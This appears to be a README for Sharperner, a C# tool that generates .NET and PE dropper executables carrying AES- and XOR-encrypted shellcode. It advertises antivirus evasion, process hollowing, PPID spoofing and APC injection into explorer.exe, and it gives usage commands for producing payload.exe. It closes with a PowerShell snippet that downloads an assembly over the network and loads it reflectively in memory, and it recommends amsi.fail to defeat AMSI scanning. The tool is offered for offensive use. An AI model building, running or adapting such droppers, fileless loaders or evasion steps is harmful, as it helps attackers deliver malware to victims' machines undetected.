
Simple executable generator with encrypted shellcode.

Primary LanguageC#


Sharperner is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.


PE binary

  • Process Hollowing
  • PPID Spoofing
  • Random generated AES key and iv
  • Final Shellcode, Key and IV are translated to morse code :)

.NET binary

  • AES + XOR encrypted shellcode
  • APC Process Injection (explorer.exe)
  • Random function names
  • Random generated AES key and iv
  • Final Shellcode, Key and IV are translated to morse code :)


/file       B64,hex,raw shellcode
/type       cs,cpp
/out        Output file Location (Optional)

Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe


To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw!

$data = (New-Object System.Net.WebClient).DownloadData('')
$assem = [System.Reflection.Assembly]::Load($data)